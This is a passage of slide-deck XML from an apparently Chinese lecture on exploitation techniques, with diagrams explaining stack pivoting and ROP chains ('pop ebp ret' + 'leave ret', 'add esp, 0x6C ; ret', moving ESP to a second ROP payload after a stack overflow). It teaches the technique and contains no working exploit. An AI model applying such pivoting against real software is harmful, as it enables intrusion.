                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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779"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1781" name="Shape 1781"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="3373667"/>
            <a:ext cx="2095200" cy="9988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1782" name="Shape 1782"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="4372667"/>
            <a:ext cx="2095200" cy="409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pivot gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1783" name="Shape 1783"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2964067"/>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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1784" name="Shape 1784"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="4307867"/>
            <a:ext cx="30004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add esp, 0x6C ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1785" name="Shape 1785"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2554467"/>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1786" name="Shape 1786"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="2489667"/>
            <a:ext cx="3000400" cy="539200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1787" name="Shape 1787"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2144867"/>
            <a:ext cx="2095200" cy="4096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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1788" name="Shape 1788"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1782" idx="1"/>
            <a:endCxn id="1784" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378633" y="4577467"/>
            <a:ext cx="1770000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1789" name="Shape 1789"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540000" y="2259867"/>
            <a:ext cx="539200" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1790" name="Shape 1790"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1789" idx="1"/>
            <a:endCxn id="1786" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378400" y="2759267"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1791" name="Shape 1791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="2752993"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1792" name="Shape 1792"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="2957793"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1793" name="Shape 1793"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="5259700"/>
            <a:ext cx="30004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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1794" name="Shape 1794"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1793" idx="0"/>
            <a:endCxn id="1784" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="4846900"/>
            <a:ext cx="0" cy="412800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1795" name="Shape 1795"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1784" idx="0"/>
            <a:endCxn id="1786" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="3028667"/>
            <a:ext cx="0" cy="1279200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 1732">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83519AA1-D96A-479D-A389-EEF6280FBE1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="869950"/>
            <a:ext cx="1419225" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB814168-B3DD-4122-BA33-9422BA60CAA9}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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799"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1800" name="Shape 1800"/>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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1801" name="Shape 1801"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="763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pop ebp ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1802" name="Shape 1802"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="290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new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1803" name="Shape 1803"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="30004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pop ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1804" name="Shape 1804"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="30004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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1805" name="Shape 1805"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="290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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1806" name="Shape 1806"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1801" idx="1"/>
            <a:endCxn id="1803" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1807" name="Shape 1807"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1808" name="Shape 1808"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1807" idx="1"/>
            <a:endCxn id="1804" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1809" name="Shape 1809"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="5121033"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1810" name="Shape 1810"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="5325833"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1811" name="Shape 1811"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="3000400" cy="539200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1812" name="Shape 1812"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1811" idx="0"/>
            <a:endCxn id="1803" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="655600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1813" name="Shape 1813"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="20952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600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1814" name="Shape 1814"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="30004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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1815" name="Shape 1815"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="763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leave ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1816" name="Shape 1816"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1803" idx="0"/>
            <a:endCxn id="1814" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="1076400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1817" name="Shape 1817"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1815" idx="1"/>
            <a:endCxn id="1814" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="1770400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1818" name="Shape 1818"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="2904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19" name="Shape 1819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="763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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1820" name="Shape 1820"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5392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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1821" name="Shape 1821"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1814" idx="0"/>
            <a:endCxn id="1804" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="948800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1822" name="Shape 1822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
